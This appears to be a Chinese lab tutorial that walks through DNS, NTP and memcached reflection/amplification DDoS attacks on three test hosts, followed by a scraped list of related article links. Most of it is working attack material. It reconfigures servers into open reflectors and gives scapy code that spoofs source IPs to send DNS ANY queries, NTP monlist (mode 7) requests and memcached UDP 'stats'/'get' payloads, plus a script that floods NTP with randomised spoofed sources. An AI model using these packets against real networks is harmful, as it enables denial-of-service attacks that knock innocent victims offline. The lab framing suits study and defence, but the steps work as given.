DDOS反射攻击
0x01 环境
包含3台主机
attact 作为攻击方,使用Centos7.2
reflect 作为流量放大器,安装有dns 、ntp 、memcached三种可以放大流量的服务
windows_server ,用于被攻击,同时抓包分析流量 ,任意版本均可。安装wireshark,用于抓包
0x02 步骤
一、DNS放大攻击
登录 reflect机器,安装并配置BIND
yum -y install bind
修改BIND默认配置
vi /etc/named.conf
listen-on port 53 { x.x.x.x; }; //其中x.x.x.x为本机IP地址
//allow-query { localhost; }; //注释此行,允许所有查询
启动服务
systemctl start named
此处需要注意centos7防火墙配置,可以关闭或添加放行规则,否则其它计算机仍然无法使用BIND查询DNS
登录attact机器,安装python 及scapy模块
yum -y install python
yum -y install epel-release
yum -y install python-pip
pip install scapy -i http://pypi.douban.com/simple --trusted-host pypi.douban.com
登录attact机器,安装dig查询工具
dig类似于windows下nslookup
yum install bind-utils
使用tcpdump抓DNS包
tcpdump -i ens33 -c 20 -w dns.pcap 'port 53'
//ens33为接口名
使用dig进行any查询
dig any baidu.com @x.x.x.x
// x.x.x.x 为reflect服务器IP,即DNS服务器IP
可以看到大量返回值,同时用wireshark打开保存下来的dns.pcap文件。用于后述分析。
登录attact机器,使用scapy构造攻击
关于scapy的使用,可以在互联网上查询。查询协议支持字段可以用如:ls(DNS)
使用scapy读取数据包及显示
pcap=rdpcap("dns.pcap")
pcap[0]
进入scapy,根据wireashark抓包构造如下数据,注意更换源地址和目标地址
源地址:攻击机IP
目的IP:DNS IP
i=IP(src="192.168.164.1",dst="192.168.164.136")
u=UDP()
q=DNSQR(qname="baidu.com",qtype=255)
d=DNS(rd=1,qdcount=1,qd=q)
r=(i/u/d)
sr1(r)
抓包观察效果,尝试伪造源地址,再次发送。
二、NTP放大攻击
登录reflect机器,安装并配置NTP服务
NTP需要4.2.6P5前的版本,可以yum list ntp查看后,yum 安装
centos7.3 直接安装即可
yum -y install ntp
配置NTP :vi /etc/ntp.conf
注释以下两行,允许所有客户端访问
#restrict 127.0.0.1
#restrict ::1
修改下面网段,提高本地访问的权限
# Hosts on local network are less restricted.
restrict 192.168.164.0 mask 255.255.255.0 nomodify notrap
注释以下一行,开启monitor功能
#disable monitor
保存文件后,启动服务
systemctl start ntpd
登录attactt机器,测试NTP服务器是否正常工作 ,并抓包分析
tcpdump
其中x.x.x.x为 reflect服务器IP
ntpdate x.x.x.x //测试服务器是否工作
ntpdc -n -c monlist x.x.x.x //获取服务器monlist列表
登录attactt机器,使用脚本构造monlist数据
编写以下python脚本,保存为send_ntp.py
from scapy.all import *
import random
ntp_server = sys.argv[1]
num = int(sys.argv[2])
for i in range(num):
ip = str(random.randint(1,200))+'.192.192.192'
send(IP(dst=ntp_server,src=ip)/UDP(sport=123)/NTP(leap=3,version=4,mode=3))
print(ip)
使用脚本发送查询数据
python send_ntp.py x.x.x.x 100
放大器IP
再次获取monlist查看
ntpdc -n -c monlist x.x.x.x
登录attactt机器,使用scapy构造攻击数据包
注意替换源地址与目标地址
源地址:攻击机IP
目的IP:ntp IP
scapy
i=IP(dst="192.168.164.129",src="192.168.5.5")
u=UDP()
n=NTPPrivate(version=2,mode=7,implementation=3,request_code=42)
send(i/u/n)
三、memcached放大攻击
登录reflect机器,安装并配置MEMCACHED服务
yum -y install memcached //yum安装memcached
systemctl start memcached //启动memcached服务
netstat -tunl //确认11211 udp端口是否开启
登录attact机器 测试MEMCACHED是否可用
yum -y install telent
telnet x.x.x.x 11211 //x.x.x.x 为reflect服务器IP
stats //查询memcached状态
set 8abc 0 0 80 //设置一个键值,注意对应80为长度
abcdefg123abcdefg123abcdefg123abcdefg123abcdefg123abcdefg123abcdefg123abcdefg123 //看到回显STORED表示成功
get 8abc //获取8abc的值
登录attactt机器,使用scapy构造攻击数据包
这里我们可以用stats查询来放大,也可以用get某一键值,来放大
因为反射攻击需要使用UDP协议,MEMCACHED使用UDP时,需加上\x00\x00\x00\x00\x00\x01\x00\x00
源地址:攻击机IP
目的IP:放大器 IP
scapy
i=IP(src="192.168.164.129",dst="192.168.164.136")
u=UDP(sport=44444,dport=11211)
raw1= "\x00\x00\x00\x00\x00\x01\x00\x00stats\r\nstats\r\n" //设置负载为 stats stats
raw2="\x00\x00\x00\x00\x00\x01\x00\x00get 8abc\r\n" //设置负载为get 8abc,获取8abc键值
sr1(i/u/raw1)
sr2(i/u/raw2)
DDOS反射攻击的更多相关文章
- 放大倍数超5万倍的Memcached DDoS反射攻击,怎么破?
欢迎大家前往腾讯云+社区,获取更多腾讯海量技术实践干货哦~ 作者:腾讯游戏云 背景:Memcached攻击创造DDoS攻击流量纪录 近日,利用Memcached服务器实施反射DDoS攻击的事件呈大幅上 ...
- DDoS的攻击方法
DDoS攻击 DDoS攻击的方法 攻击网络带宽资源 我们可以采用对目标的网络带宽资源进行攻击,目的就是浪费对方有限的网络带宽资源,使得目标服务出现网络滞缓直至网络带宽资源匮乏,无法访问或访问速度慢. ...
- DDOS攻击与防御简单阐述,列出DDOS的攻击方法和防御方法
参考1:https://www.hi-linux.com/posts/50873.html#%E7%BD%91%E7%BB%9C%E5%B1%82-ddos-%E6%94%BB%E5%87%BB 什么 ...
- DDOS的攻击原理和防护指南(转)
DDOS的攻击原理和防护指南 作者:冰盾防火墙 网站:www.bingdun.com 日期:2008-01-07 我们现在来分析DDOS的攻击原理. 首先,DDOS是英文Distribut ...
- linux ddos防御攻击
Linux Ddos防御攻击 [root@lxh ~]# netstat -ntu |awk '{print $5}'|grep '[0-9]'|cut -d: -f1 |sort |uniq -c| ...
- DDOS的攻击原理和防护指南
我们现在来分析DDOS的攻击原理. 首先,DDOS是英文Distributed Denial of Service的缩写,意思是分布式拒绝服务.拒绝服务又是什么意思呢?就是采取一些垃圾数据包来阻塞网站 ...
- DDOS的攻击原理和如何防护网站和游戏恶意攻击
DDOS的攻击原理和如何防护网站和游戏恶意攻击 1-DDOS全名是Distribution Denial of Service (分布式拒绝服务攻击),很多DOS攻击源 ...
- 常见的 CSRF、XSS、sql注入、DDOS流量攻击
CSRF攻击 :跨站请求伪造攻击 ,CSRF全名是Cross-site request forgery,是一种对网站的恶意利用,CSRF比XSS更具危险性 攻击者一般会使用吸引人的图片去引导用户点击进 ...
- 不可不知 DDoS的攻击原理与防御方法
DoS攻击.DDoS攻击和DRDoS攻击相信大家已经早有耳闻了吧!DoS是Denial of Service的简写就是拒绝服务,而DDoS就是Distributed Denial of Service ...
随机推荐
- SpringMVC 解析(三) Controller 注解
我在前面的文章中介绍了Spring MVC最核心的组件DispatcherServlet,DispatcherServlet把Servlet容器(如Tomcat)中的请求和Spring中的组件联系到一 ...
- [入门到吐槽系列] Webix 10分钟入门 一 管理后台制作
前言 本人是服务端程序员,同时需要兼职前端开发.常用的就是原生态的HTML.Javascript,也用过ExtJS.Layui.可是ExtJS变公司后非常难用.Layui上手还行,用过一段时间,会觉得 ...
- 暑假撸系统5- Thymeleaf 常用标签的
上次博客已经是三天前了,后期修补和细化的东西多了,进度没有前几天那么明显了.因为原来工作大多是后端居多,如果非要前台也会选择一些相对对ui依赖比较小的框架,比如extjs,所以这次的基础排版就费劲了, ...
- 利用shell脚本使用kubeadm部署kubenetes 1.18.6集群环境
# README # 此脚本需要在master节点上使用 # 注意root密码,请提前修改 # 个人实验环境,注意机器最低配置:master(2G内存,1cpu2核心,否则集群会创建失败),node( ...
- 突然发现,npm里request依赖包已经弃用,怎么办?
摘要:在npm官网查看了request依赖包的当前状态,果然在2020年就被弃用了. 本文分享自华为云社区<npm里request依赖包已经弃用?致敬并调研替代方案!>,作者: gentl ...
- Spring Boot数据访问之动态数据源切换之使用注解式AOP优化
在Spring Boot数据访问之多数据源配置及数据源动态切换 - 池塘里洗澡的鸭子 - 博客园 (cnblogs.com)中详述了如何配置多数据源及多数据源之间的动态切换.但是需要读数据库的地方,就 ...
- RocketMQ的invokeSync call timeout异常的解决办法
缘起 在RocketMQ客户端的DefaultMQPushConsumer的start方法被执行时,时不时会报出invokeSync call timeout异常,如下: Caused by: jav ...
- k8s之pod讲解
什么是Pod? Pod 是一组紧密关联的容器集合,它由一组.一个或多个容器组成,每个Pod还包含了一个Pause容器,Pause容器是Pod的父容器,主要负责僵尸进程的回收管理,通过Pause容 ...
- kali安装python2、python3以及对应的pip
kali自带python2,python3python --version #查看python版本安装pipwget https://bootstrap.pypa.io/pip/2.7/get-pip ...
- [数分笔记]问题1.1 T1
题目:非负整数a,b使得为整数,求证这个整数必是某一整数的平方.(1988年第29届国际数学奥林匹克竞赛试题) 证明:设k=,k为非负整数 1°a=b k=2a²/(1+a²)=2-2/(1+a²) ...